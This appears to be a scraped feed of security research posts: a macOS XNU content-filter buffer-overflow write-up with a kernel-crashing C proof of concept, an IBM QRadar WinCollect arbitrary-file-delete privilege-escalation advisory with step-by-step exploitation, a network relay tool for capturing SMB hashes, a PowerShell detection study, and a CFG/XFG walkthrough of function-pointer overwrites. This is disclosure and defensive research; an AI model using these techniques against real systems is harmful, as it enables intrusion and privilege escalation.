	if ((filter_control_unit & NECP_MASK_USERSPACE_ONLY) != 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_userspace_only);
		goto done;
	}
	if (cfil_active_count == 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_in_vain);
		goto done;
	}
	if (so->so_cfil != NULL) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_already);
		CFIL_LOG(LOG_ERR, "already attached");
	} else {
		cfil_info_alloc(so, NULL);
		if (so->so_cfil == NULL) {
			error = ENOMEM;
			OSIncrementAtomic(&cfil_stats.cfs_sock_attach_no_mem);
			goto done;
		}
		so->so_cfil->cfi_dir = dir;
	}
	if (cfil_info_attach_unit(so, filter_control_unit, so->so_cfil) == 0) {
		CFIL_LOG(LOG_ERR, "cfil_info_attach_unit(%u) failed",
		    filter_control_unit);
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_failed);
		goto done;
	}
	CFIL_LOG(LOG_INFO, "so %llx filter_control_unit %u sockID %llx",
	    (uint64_t)VM_KERNEL_ADDRPERM(so),
	    filter_control_unit, so->so_cfil->cfi_sock_id);

	so->so_flags |= SOF_CONTENT_FILTER;
	OSIncrementAtomic(&cfil_stats.cfs_sock_attached);

	/* Hold a reference on the socket */
	so->so_usecount++;

	/*
	 * Save passed addresses for attach event msg (in case resend
	 * is needed.
	 */
	if (remote != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len); // Part B
	}
	if (local != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len); // Part C
	}

	error = cfil_dispatch_attach_event(so, so->so_cfil, 0, dir);
	/* We can recover from flow control or out of memory errors */
	if (error == ENOBUFS || error == ENOMEM) {
		error = 0;
	} else if (error != 0) {
		goto done;
	}

	CFIL_INFO_VERIFY(so->so_cfil);
done:
	return error;
}

We can see that in (Part A) the function receives two sockaddrs parameters (local and remote) which are user controlled and then using their sa_len struct member (remote in (Part B) and local in (Part C)) in order to copy data to cfi_so_attach_laddr and cfi_so_attach_faddr. Parts (A) (B) and (C) were all result of a new changes in XNU.

So what’s the problem? The problem is there is lack of check of sa_len which can be set up to 255 and then will be used in a memcpy to copy data into a union sockaddr_in_4_6 which is a 28 bytes struct – resulting in a buffer overflow.

The PoC below which is almost identical to Ian Beer’s mptcp with two changes. This POC requires a pre-requisite to reach the vulnerable area. In order to trigger the vulnerability we need to use an MDM enrolled device with NECP policy, or attach the socket to a valid filter_control_unit. One way to do it is to create one with cfilutil and then manually write it to kernel memory using a kernel debugger.

After running the POC, it will crash the kernel:

#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>

int main(int argc, const char * argv[ ]) {

	int sock = socket(AF_INET, SOCK_STRAEM, IPPROTO,TCP);
	If (sock < 0) {
		printf(“socket failed\n”);
		return -1;
	}
	printf(“got socket: %d\n”, sock);
	struct sockaddr* sockaddr_dst = malloc(256);
	memset(sockaddr_dst, ‘A’, 256);
	sockaddr_dst->sa_len = 255;
	sockaddr_dst->sa_faimly =AF_INET;
	sa_endpoint_t eps = {0};
	eps.sae_srcif = 0;
	eps.sae_srcaddr = NULL;
	eps.sae_srcaddrlen = 0;
eps.sae_dstaddr = sockaddr_dst;
eps.sae_dstaddrlen = 255;
int err = connectx(sock,&eps,SAE_ASSOCID_ANY,0,NULL,0,NULL,NULL);
  printf(“err: %d\n”,err);
close(sock);
return 0;

0x3- Patch

The patch of the issue is interesting too because while the source code (iOS 13.6 / MacOS 10.15.6) provide this patch:

if (remote != NULL && (remote->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len);
	}
	if (local != NULL && (local->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len);
	}

The disassembly shows something else…

Here is a picture of the vulnerable part in macOS 10.15.1 compiled kernel (before the issue was reported):

Here is a picture of the vulnerable part in macOS 10.15.6 compiled kernel (after the issue was reported):

The panic call with the mecmpy_chk is gone alongside the patch!

Did the original developer knew this function was vulnerable and placed it there as a placeholder until a proper patch? Your guess is good as ours.

Also note that the call to memcpy_chk before the real_mode_bootstarp_end (which is a wraparound of memcpy) is what kept this issue from being exploitable.

0x4- What can we take from this?

  1. Read comments they might give us valuable information
  2. Newly added code is oftentimes buggy
  3. Content filter code is complex and tricky 
  4. Now with Pangu’s recent blog post and Ian Beer mptcp bug we can learn that sockaddr->sa_len already caused multiple issues and should be audited a bit more carefully.

0x5- Attacks in the wild?

This issue is not dangerous. During our investigation of this bug, ZecOps checked its targeted threats intelligence database, and saw no active attacks associated with this issue. We still advise to update to the latest version to receive all other updates.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

IBM QRadar Wincollect Escalation of Privilege (CVE-2020-4485 & CVE-2020-4486)

By: admin
11 September 2020 at 12:57

Summary

Assigned CVE: CVE-2020-4485 and CVE-2020-4486 have been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 13/05/2020

Exploit Code: N/A

Vendor’s Advisory: https://www.ibm.com/support/pages/node/6257885

An Elevation of Privilege (EoP) exists in IBM QRadar Wincollect 7.2.0 – 7.2.9 . The vulnerability described gives the ability to a low privileged user to delete any file from the System and disable the Wincollect service. This arbitrary delete vulnerability can be leveraged in order to gain access as NT AUTHORITY\SYSTEM. During the exploitation, the attacker disables the Wincollect service.

Description

There are two distinct root causes which can lead to the same issue (arbitrary delete):
After the installation of the WinCollect, the installer remains under the folder c:\Windows\Installer . Any user with low privileges can run the installer with the following command:

msiexec /fa c:\Windows\Installer****.msi

The WinCollect’s installer, although it will eventually fail when executed by a low privileged user, it will create log files under the User’s Temp folder.

At some point, the installer will try to delete those log files as SYSTEM. As long as the user controls the files in his Temp folder (C:\Users\username\AppData\Local\Temp), they can create a symlink targeting any file in the system. When the installer tries to delete these files, it will follow the symlink and will perform the delete actions as SYSTEM.

Even if the symlinks are mitigated in the future by Microsoft, an attacker can achieve the arbitrary delete by editing the file ~xxxx.tmp .

The file C:\Users\username\AppData\Local\Temp\~xxxx.tmp where xxxx is a random hex, ends with the lines:

[SearchRepalceTargetBackupFiles]
C:\Program Files\IBM\WinCollect\config\CmdLine.txt=C:\Users\attacker\AppData\Local\Temp_isFD30
C:\Program Files\IBM\WinCollect\config\logconfig_template.xml=C:\Users\attacker\AppData\Local\Temp_isFD8F
C:\Program Files\IBM\WinCollect\templates\tmplt_AgentCore.xml=C:\Users\attacker\AppData\Local\Temp_isFDAF

An attacker can edit these lines and add the files he wants to delete. For example:

[SearchRepalceTargetBackupFiles]
C:\Program Files\IBM\WinCollect\config\CmdLine.txt=C:\windows\win.ini
C:\Program Files\IBM\WinCollect\config\logconfig_template.xml=C:\Users\Admin\whatever.exe
C:\Program Files\IBM\WinCollect\templates\tmplt_AgentCore.xml=C:\Users\anotheruser\logs.txt

When we cancel the installer, these files will be deleted as SYSTEM.

As a bonus, during this process, the wincollect service will stop and will remain stopped, until we cancel the operation.

Exploitation

In order to Exploit the issue, no special program is needed .

In the following paragraph, a step by step explanation of the Video PoC is provided.

Please note, that the vulnerability of the IBM QRadar Wincollect ends when we delete the WER folder (or any other file/folder you want to delete).

The use of the arbitrary delete issues, in order to escalate to SYSTEM, is irrelevant to this vulnerability and it is an MS Windows issue. This technique has been described by Jonas L in his blogpost https://secret.club/2020/04/23/directory-deletion-shell.html

The delete.exe is an implementation of this technique, which can be found in my github repo https://github.com/DimopoulosElias/Primitives

Video PoC Step By Step


00:00-00:11: We present the environment. We are low privileged users and the installer file we are going to use is the 11ec43.msi . This file, belongs to IBM and is the installer file of the wincollect agent.

00:11-00:22: As low privileged users, we run the installer. At the end of this time frame (00:22) the wincollect service has stopped . We can stay at this position as long as we want to and perform any actions we want to, with the wincollect service being disabled (CVE-2020-4485).

00:22-00:58: We are going to use the technique presented by Jonas L , in order to leverage the arbitrary delete and gain access as SYSTEM. For this to be achieved, we need to delete the folder C:\ProgramData\Microsoft\Windows\WER , which can not be deleted by a low privileged user. However, some sub-folders can be deleted. At this time frame, we delete the sub-folders we are able to, without any exploitation.

00:58-02:42: By exploiting the CVE-2020-4486 , we delete the remaining files and sub-folders from the WER folder. A low privileged user, would not be able to delete those files/folders, as we presented in the previous time frame. The $INDEX_ALLOCATION is used in order to delete a folder instead of a file .

02:42-03:58: We run the exploitation procedure one more time, in order to delete the C:\ProgramData\Microsoft\Windows\WER folder. At this point, the use of CVE-2020-4486 ends. The rest of the video presents the use of this primitive in order to escalate to SYSTEM and is irrelevant to the IBM WinCollect issues.

03:58-end: Now that we have deleted the WER folder, we use the https://github.com/DimopoulosElias/Primitives is order to become a SYSTEM. Again, this has nothing to do with the IBM vulnerabilities. It’s a primitive which allows us to use any (or almost any) arbitrary delete, in order to escalate to SYSTEM.

We will leave the escalation with the use of symlinks as an exercise for you 🙂 .

Resources

GitHub

You can find our exploits code in our GitHub at https://github.com/RedyOpsResearchLabs/

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post IBM QRadar Wincollect Escalation of Privilege (CVE-2020-4485 & CVE-2020-4486) appeared first on REDYOPS Labs.

StreamDivert: Relaying (specific) network connections

10 September 2020 at 08:14

Author: Jelle Vergeer

The first part of this blog will be the story of how this tool found its way into existence, the problems we faced and the thought process followed. The second part will be a more technical deep dive into the tool itself, how to use it, and how it works.

Storytime

About 1½ half years ago I did an awesome Red Team like project. The project boils down to the following:

We were able to compromise a server in the DMZ region of the client’s network by exploiting a flaw in the authentication mechanism of the software that was used to manage that machine (awesome!). This machine hosted the server part of another piece of software. This piece of software basically listened on a specific port and clients connected to it – basic client-server model. Unfortunately, we were not able to directly reach or compromise other interesting hosts in the network. We had a closer look at that service running on the machine, dumped the network traffic, and inspected it. We came to the conclusion there were actual high value systems in the client’s network connecting to this service..! So what now? I started to reverse engineer the software and came to the conclusion that the server could send commands to clients which the client executed. Unfortunately the server did not have any UI component (it was just a service), or anything else for us to send our own custom commands to clients. Bummer! We furthermore had the restriction that we couldn’t stop or halt the service. Stopping the service, meant all the clients would get disconnected and this would actually cause quite an outage resulting in us being detected (booh). So.. to sum up:

  • We compromised a server, which hosts a server component to which clients connect.
  • Some of these clients are interesting, and in scope of the client’s network.
  • The server software can send commands to clients which clients execute (code execution).
  • The server has no UI.
  • We can’t kill or restart the service.

What now? Brainstorming resulted in the following:

  • Inject a DLL into the server to send custom commands to a specific set of clients.
  • Inject a DLL into the server and hook socket functions, and do some logic there?
  • Research if there is any Windows Firewall functionality to redirect specific incoming connections.
  • Look into the Windows Filtering Platform (WFP) and write a (kernel) driver to hook specific connections.

The first two options quickly fell of, we were too scared of messing up the injected DLL and actually crashing the server. The Windows Firewall did not seem to have any capabilities regarding redirecting specific connections from a source IP. Due to some restrictions on the ports used, the netsh redirect trick would not work for us. This left us with researching a network driver, and the discovery of an awesome opensource project: WinDivert (Thanks to DiabloHorn for the inspiration). WinDivert is basically a userland library that communicates with a kernel driver to intercept network packets, sends them to the userland application, processes and modifies the packet, and reinjects the packet into the network stack. This sounds promising! We can develop a standalone userland application that depends on a well-written and tested driver to modify and re-inject packets. If our userland application crashes, no harm is done, and the network traffic continues with the normal flow. From there on, a new tool was born: StreamDivert

StreamDivert

StreamDivert is a tool to man-in-the-middle or relay in and outgoing network connections on a system. It has the ability to, for example, relay all incoming SMB connections to port 445 to another server, or only relay specific incoming SMB connections from a specific set of source IP’s to another server. Summed up, StreamDivert is able to:

  • Relay all incoming connections to a specific port to another destination.
  • Relay incoming connections from a specific source IP to a port to another destination.
  • Relay incoming connections to a SOCKS(4a/5) server.
  • Relay all outgoing connections to a specific port to another destination.
  • Relay outgoing connections to a specific IP and port to another destination.
  • Handle TCP, UDP and ICMP traffic over IPv4 and IPv6.

Schematic inbound and outbound relaying looks like the following:

Relaying of incoming connections

Relaying of outgoing connections

Note that StreamDivert does this by leveraging the capabilities of an awesome open source library and kernel driver called WinDivert. Because packets are captured at kernel level, transported to the userland application (StreamDivert), modified, and re-injected in the kernel network stack we are able to relay network connections, regardless if there is anything actually  listening on the local destination port.

The following image demonstrates the relay process where incoming SMB connections are redirected to another machine, which is capturing the authentication hashes.

Example of an SMB connection being diverted and relayed to another server.

StreamDivert source code is open-source on GitHub and its binary releases can be downloaded here.

Detection

StreamDivert (or similar tooling modifying network packets using the WinDivert driver) can be detected based on the following event log entries:

Machine learning from idea to reality: a PowerShell case study

2 September 2020 at 07:55

Detecting both ‘offensive’ and obfuscated PowerShell scripts in Splunk using Windows Event Log 4104

Author: Joost Jansen

This blog provides a ‘look behind the scenes’ at the RIFT Data Science team and describes the process of moving from the need or an idea for research towards models that can be used in practice. More specifically, how known and unknown PowerShell threats can be detected using Windows event log 4104. In this case study it is shown how research into detecting offensive (with the term ‘offensive’ used in the context of ‘offensive security’) and obfuscated PowerShell scripts led to models that can be used in a real-time environment.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

Introduction to PowerShell

PowerShell plays a huge role in a lot of incidents that are analyzed by Fox-IT. During the compromise of a Windows environment almost all actors use PowerShell in at least one part of their attack, as illustrated by the vast list of actors linked to this MITRE technique [1]. PowerShell code is most frequently used for reconnaissance, lateral movement and/or C2 traffic. It lends itself to these purposes, as the PowerShell cmdlets are well-integrated with the Windows operating system and it is installed along with Windows in most recent versions.

The strength of PowerShell can be illustrated with the following example. Consider the privilege-escalation enumeration script PowerUp.ps1 [2]. Although the script itself consists of 4010 lines, it can simply be downloaded and invoked using:

In this case, the script won’t even touch the disk as it’s executed in memory. Since threat actors are aware that there might be detection capabilities in place, they often encode or obfuscate their code. For example, the command executed above can also be run base64-encoded:

which has the exact same result.

Using tools like Invoke-Obfuscation [3], the command and the script itself can be obfuscated even further. For example, the following code snippet from PowerUp.ps1

can also be obfuscated as:

These well-known offensive PowerShell scripts can already be detected by using static signatures, but small modifications on the right place will circumvent the detection. Moreover, these signatures might not detect new versions of the known offensive scripts, let alone detect new techniques. Therefore, there was an urge to create models to detect offensive PowerShell scripts regardless of their obfuscation level, as illustrated in Table 1.

Table 1: Detection of different malicious PowerShell scripts

Don’t reinvent the wheel

As we don’t want to re-invent the wheel, a literature study revealed fellow security companies had already performed research on this subject [4, 5], which was a great starting point for this research. As we prefer easily explainable classification models over complex ones (e.g. the neural networks used in the previous research) and obviously faster models over slower ones, not all parts of the research were applicable. However, large parts of the data gathering & pre-processing phase were reused while the actual features and classification method were changed.

Since detecting offensive & obfuscated PowerShell scripts are separate problems, they require separate training data. For the offensive training data, PowerShell scripts embedded in “known bad” GitHub repositories were scraped. For the obfuscated training data, parts of the Revoke-Obfuscation training data set were used [6]. An equal amount of legitimate (‘known not-obfuscated’ and “known not-offensive”) scripts were added to the training sets (retrieved from the PowerShell Gallery [7]) resulting in the training sets listed in Table 2.

Table 2: Training set sizes

To keep things simple and explainable the decision was made to base the initial model on token (offensive) and character (obfuscated) percentages. This did require some preprocessing of the scripts (e.g. removing the comments), calculating the features and in the case of the offensive scripts, tokenization of the PowerShell scripts. Figures 1 & 2 illustrate how some characters and tokens are unevenly distributed among the training sets.

Figure 1: Average occurrence of several ASCII characters in obfuscated and not-obfuscated scripts
Figure 2: Average occurrence of several tokens in offensive and not-offensive scripts

The percentages were then used as features for a supervised classification model to train, along with some additional features based on known bad tokens (e.g. base64, iex and convert) and several regular expression patterns. Afterwards all features and labels were fed to our SupervisedClassification helper class, which is used in many of our projects to standardize the process of (synthetic) sampling of training data, DataFrame transformations, model selection and several other tasks. For both models, the SupervisedClassification class selected the Random Forest algorithm for the classifying task. Figure 3 summarizes the workflow for the obfuscated PowerShell model.

Figure 3: High-level overview of the training process for the obfuscation model

Usage in practice

Since these models were exported, they can be used for multiple purposes by loading the models in Python, feeding PowerShell scripts to it and observe the predicted outcomes. In this example, Splunk was chosen as the platform to use this model because it is part of our Managed Detection & Response service and because of Splunk’s ability to easily run custom Python commands.

Windows is able to log blocks of PowerShell code as it is executed, called ‘PowerShell Script Block Logging’ which can be enabled via GPO or manual registry changes. The logs (identified by Windows Event ID 4101) can then be piped to a Splunk custom command Reconstruct4101Logging, which will process the script blocks back into the format the model was trained on. Afterwards, the reconstructed script is piped into e.g. the ObfuscatedPowershell custom command, which will load the pre-trained model, predict the probabilities for the scripts being obfuscated and returns these predictions back to Splunk. This is shown in Figure 4.

Figure 4: Usage of the pre-trained model in Splunk along with the corresponding query

Performance

Back in Splunk some additional tuning can be performed (such as setting the threshold for predicting the positive class to 0.7) to reduce the amount of false positives. Using cross-validation, a precision score of 0.94 was achieved with an F1 score of 0.9 for the obfuscated PowerShell model. The performance of the offensive model is not yet as good as the obfuscated model, but since there are many parameters to tune for this model we expect this to improve in the foreseeable future. The confusion matrix for the obfuscated model is shown in Table 3.

Table 3: Confusion matrix

Despite the fact that other studies achieve even higher scores, we believe that this relatively simple and easy to understand model is a great first step, for which we can iteratively improve the scores over time. To finish off, these models are included in our Splunk Managed Detection Engine to check for offensive & obfuscated PowerShell scripts on a regular interval.

Conclusion and recommendation

PowerShell, despite being a legitimate and very useful tool, is frequently misused by threat actors for various malicious purposes. Using static signatures, well-known bad scripts can be detected, but small modifications may cause these signatures to be circumvented. To detect modified and/or new PowerShell scripts and techniques, more and better generic models should be researched and eventually be deployed in real-time log monitoring environments. PowerShell logging (including but not limited to the Windows Event Logs with ID 4104) can be used as input for these models. The recommendation is therefore to enable the PowerShell logging in your organization, at least at the most important endpoints or servers. This recommendation, among others, was already present in our whitepaper on ‘Managing PowerShell in a modern corporate environment‘ [8] back in 2017 and remains very relevant to this day. Additional information on other defensive measures that can be put into place can also be found in the whitepaper.

References

[1] https://attack.mitre.org/techniques/T1059/001/
[2] https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
[3] https://github.com/danielbohannon/Invoke-Obfuscation
[4] https://arxiv.org/pdf/1905.09538.pdf
[5] https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
[6] https://github.com/danielbohannon/Revoke-Obfuscation/tree/master/DataScience
[7] https://www.powershellgallery.com/
[8] https://www.nccgroup.com/uk/our-research/managing-powershell-in-a-modern-corporate-environment/

Exploit Development: Between a Rock and a (Xtended Flow) Guard Place: Examining XFG

23 August 2020 at 00:00

Introduction

Previously, I have blogged about ROP and the benefits of understanding how it works. Not only is it a viable first-stage payload for obtaining native code execution, but it can also be leveraged for things like arbitrary read/write primitives and data-only attacks. Unfortunately, if your end goal is native code execution, there is a good chance you are going to need to overwrite a function pointer in order to hijack control flow. Taking this into consideration, Microsoft implemented Control Flow Guard, or CFG, as an optional update back in Windows 8.1. Although it was released before Windows 10, it did not really catch on in terms of “mainstream” exploitation until recent years.

After a few years, and a few bypasses along the way, Microsoft decided they needed a new Control Flow Integrity (CFI) solution - hence XFG, or Xtended Flow Guard. David Weston gave an overview of XFG at his talk at BlueHat Shanghai 2019, and it is pretty much the only public information we have at this time about XFG. This “finer-grained” CFI solution will be the subject of this blog post. A few things before we start about what this post is and what it isn’t:

  1. This post is not an “XFG internals” post. I don’t know every single low level detail about it.
  2. Don’t expect any bypasses from this post - this mitigation is still very new and not very explored.
  3. We will spend a bit of time understanding what indirect function calls are via function pointers, what CFG is, and why XFG is a very, very nice mitigation (IMO).

This is simply going to be an “organized brain dump” and isn’t meant to be a “learn everything you need to know about XFG in one sitting” post. This is just simply documenting what I have learned after messing around with XFG for a while now.

The Blueprint for XFG: CFG

CFG is a pretty well documented exploit mitigation, and I have done my fair share of documenting it as well. However, for completeness sake, let’s talk about how CFG works and its potential shortcomings.

Note that before we begin, Microsoft deserves recognition for being one of the leaders in implementing a Control Flow Integrity (CFI) initiative and among the first to actually release a CFI solution.

Firstly, to enable CFG, a program is compiled and linked with the /guard:cf flag. This can be done through the Microsoft Visual Studio tool cl (which we will look at later). However, more easily, this can be done by opening Visual Studio and navigating to Project -> Properties -> C/C++ -> Code Generation and setting Control Flow Guard to Yes (/guard:cf)

CFG at this point would now be enabled for the program - or in the case of Microsoft binaries, they would already be CFG enabled (most of them). This causes a bitmap to be created, which essentially is made up of all functions within the process space that are “protected by CFG”. Then, before an indirect function call is made (we will explore what an indirect call is shortly if you are not familiar), the function being called is sent to a special CFG function. This function checks to make sure that the function being called is a part of the CFG bitmap. If it is, the call goes through. If it isn’t, the call fails.

Since this is a post about XFG, not CFG, we will skip over the technical details of CFG. However, if you are interested to see how CFG works at a lower level, Morten Schenk has an excellent post about its implementation in user mode (the Windows kernel has been compiled with CFG, known as kCFG, since Windows 10 1703. Note that Virtualization-Base Security, or VBS, is required for kCFG to be enforced. However, even when VBS is disabled, kCFG has some limited functionality. This is beyond the scope of this blog post).

Moving on, let’s examine how an indirect function call (e.g. call [rax] where RAX contains a function address or a function pointer), which initiates a control flow transfer to a different part of an application, looks without CFG or XFG. To do this, let’s take a look at a very simple program that performs a control flow transfer.

Note that you will need Microsoft Visual Studio 2019 Preview 16.5 or greater in order to follow along.

Let’s talk about what is happening here. Firstly, this code is intentionally written this way and is obviously not the most efficient way to do this. However, it is done this way to help simulate a function pointer overwrite and the benefits of XFG/CFG.

Firstly, we have a function called void cfgTest() that just prints a sentence. This function is then assigned to a function pointer called void (*cfgTest1), which actually is an array. Then, in the main() function, the function pointer void (*cfgTest1) is executed. Since void (*cfgtest1) is pointing to void cfgTest(), this will actually just cause void (*cfgtest1) to just execute void cfgTest(). This will create a control flow transfer, as the main() function will perform a call to the void (*cfgTest1) function, which will then call the void cfgTest() function.

To compile with the command line tool cl, type in “x64 Native Tools Command Prompt for VS 2019 Preview” in the Start menu and run the program as an administrator.

This will drop you into a special Command Prompt. From here, you will need to navigate to the installation path of Visual Studio, and you will be able to use the cl tool for compilation.

Let’s compile our program now!

The above command essentially compiles the program with the /Zi flag and the /INCREMENTAL:NO linking option. Per Microsoft Docs, /Zi is used to create a .pdb file for symbols (which will be useful to us). /INCREMENTAL:NO has been set to instruct cl not to use the incremental linker. This is because the incremental linker is essentially used for optimization, which can create things like jump thunks. Jump thunks are essentially small functions that only perform a jump to another function. An example would be, instead of call function1, the program would actually perform a call j_function1. j_function1 would simply be a function that performs a jmp function1 instruction. This functionality will be turned off for brevity. Since our “dummy program” is so simple, it will be optimized very easily. Knowing this, we are disabling incremental linking in order to simulate a “Release” build (we are currently building “Debug” builds) of an application, where incremental linking would be disabled by default. However, none of this is really prevalent here - just a point of contention to the reader. Just know we are doing it for our purposes.

The result of the compilation command will place the output file, named Source.exe in this case, into the current directory along with a symbol file (.pdb). Now, we can open this application in IDA (you’ll need to run IDA as an administrator, as the application is in a privileged directory). Let’s take a look at the main() function.

Let’s examine the assembly above. The above function loads the void (*cfgTest1) function pointer into RCX. Since void (*cfgTest1) is a function pointer to an array, the value in RCX itself isn’t what is needed to jump to the array. Only when RCX is dereferenced in the call qword ptr [rcx+rax] instruction does program execution actually perform a control flow transfer to void (*cfgTest1)’s first index - which is void cfgTest(). This is why call qword ptr [rcx+rax] is being performed, as RAX is the position in the array that is being indexed.

Taking a look at the call instruction in IDA, we can see that clearly this will redirect program execution to void cfgTest().

Additionally, in WinDbg, we can see that Source!cfgTest1, which is a function, points to Source!cfgTest.

Nice! We know that our program will redirect execution from main() to void (*cfgTest1) and then to void cfgTest()! Let’s say as an attacker, we had an arbitrary write primitive and we were able to overwrite what void (*cfgTest1) points to. We could actually change where the application actually ends up calling! This is not good from a defensive perspective.

Can we mitigate this issue? Let’s go back and recompile our application with CFG this time and find out.

This time, we add /guard:cf as a flag, as well as a linking option.

Disassembling the main() function in IDA again, we notice things look a bit different.

Very interesting! Instead of making a call directly to void (*cfgTest1) this time, it seems as though the function __guard_disaptch_icall_fptr will be invoked. Let’s set a breakpoint in WinDbg on main() and see how this looks after invoking the CFG dispatch function.

After setting a breakpoint on the main() function, code execution hits the CFG dispatch function.

The CFG dispatch function then performs a dereference and jumps to ntdll!LdrpDispatchUserCallTarget.

We won’t get into the technical details about what happens here, as this post isn’t built around CFG and Morten’s blog already explains what will happen. But essentially, at a high level, this function will check the CFG bitmap for the Source.exe process and determine if the void cfgTest() function is a valid target (a.k.a if it’s in the bitmap). Obviously this function hasn’t been overwritten, so we should have no problems here. After stepping through the function, control flow should transfer back to the void cfgTest() function seamlessly.

Execution has returned back to the void cfgTest() function. Additionally what is nice, is the lack of overhead that CFG put on the program itself. The check was very quick because Microsoft opted to use a bitmap instead of indexing an array or some other structure.

You can also see what functions are protected by the CFG bitmap by using the dumpbin tool within the Visual Studio installation directory and the special Visual Studio Command Prompt. You can use the command dumpbin /loadconfig APPLICATION.exe to view this.

Let’s see if we can take this even further and potentially show why XFG is defintley a better/more viable option than CFG.

CFG: Potential Shortcomings

As mentioned earlier, CFG checks functions to make sure they are part of the “CFG bitmap” (a.k.a protected by CFG). This means a few things from an adversarial perspective. If we were to use VirtualAlloc() to allocate some virtual memory, and overwrite a function pointer that is protected by CFG with the returned address of the allocation - CFG would make the program crash.

Why? VirtualAlloc() (for instance) would return a virtual address of something like 0xdb0000. When the application in question was compiled with CFG, obviously this memory address wasn’t a part of the application. Therefore, this address wouldn’t be “protected by CFG” and the program would crash. However, this is not very practical. Let’s think about what an adversary tries to accomplish with ROP.

Adversaries want to return into a Windows API function like VirtualProtect() in order to dynamically change permissions of memory. What is interesting about CFG is that in addition to the program’s functions, all exported Windows functions that make up the “module” import list for a program can be called. For instance, the application we are looking at is called Source.exe Dumping the loaded modules for the application, we can see that KERNELBASE.dll, kernel32.dll, and ntdll.dll (which are the usual suspects) are loaded for this application.

Let’s see if/how this could be abused!

Let’s firstly update our program with a new function.

This program works exactly as the program before, except the function void protectMe2() is added in to add another user defined function to the CFG bitmap. Note that this function will never be executed, and that is poor from a programmer’s perspective. However, this function’s sole purpose is to just show another protected function. This can be verified again with dumpbin.

Here, we can see that Source!cfgTest1 still points to Source!cfgTest

Let’s recall what was said earlier about how CFG only validates if a function resides within the CFG bitmap or not. Let’s now perform a simulated arbitrary write condition in WinDbg to overwrite what Source!cfgTest points to, with Source!protectMe2.

The above command uses x to show the address of the Source!protectMe2 function and then uses dps to show that Source!cfgTest1 still points to Source!cfgTest1. Then, using ep, we overwrite the function pointer. dps once again verifies that the function overwrite has occurred.

Let’s now step through the program to see what happens. Program execution firstly hits the CFG dispatch function.

Looking at the RAX register, which is used to hold the address of the function CFG will check, we see it has been overwritten with Source!protectMe2 instead of Source!cfgTest.

Execution then hits ntdll!LdrpDispatchUserCallTarget. After walking the function, which validates if the in scope function resides within the CFG bitmap for the process, execution redirects to Source!protectMe2!

This is very interesting from an adversarial perspective, as we were successfully able to overwrite a function pointer and CFG didn’t terminate our process! The only caveat being that the function is a part of the current process’s CFG bitmap.

What is even more interesting, is that function pointers protected by CFG can be overwritten by any exported function at runtime! Let’s rework this example, but try to call a Windows API function like KERNELBASE!WriteProcessMemory.

First, we simulate the arbitrary write by overwriting Source!cfgTest1 with KERNELBASE!WriteProcessMemory.

Program execution passes through Source!__guard_dispatch_icall_fptr and ntdll!LdrpDispatchUserCallTarget and we can clearly see execution returns to KERNELBASE!WriteProcessMemory.

This shows that even with CFG enabled, it is still possible to call functions that have overwritten other functions. This is not good, as calls can still be made with malign intent. Additionally, calling functions of different types out of context may result in a type confusion or other programmatic behavioral problems.

Now that we have armed ourselves with an understanding of why CFG is an amazing start to solving the CFI problem, but yet still contains many shortcomings, let’s get into XFG and what makes it better and different.

XFG: The Next Era of CFI for Windows

Let’s start out by talking about what XFG is at a high level. After we go through some high level details about XFG, we will compile our program with XFG and walk through the dispatch function(s), as well as perform some simulated function pointer overwrites to see how XFG reacts and additionally see how XFG differs from CFG.

My last CrowdStrike blog post touches on XFG, but not in too much detail. XFG essentially is a more “hardened” version of CFG. How so? XFG, at compile time, produces a “type-based hash” of a function that is going to be called in a control flow transfer. This hash will be placed 8 bytes above the target function, and will be compared against a preserved version of that hash when an XFG dispatch function is executed. If the hashes match, control flow transfer is then passed to the in scope function that was checked. If the hashes differ, the program crashes.

Let’s take a look a bit more at this. Firstly, let’s compile our program with XFG!

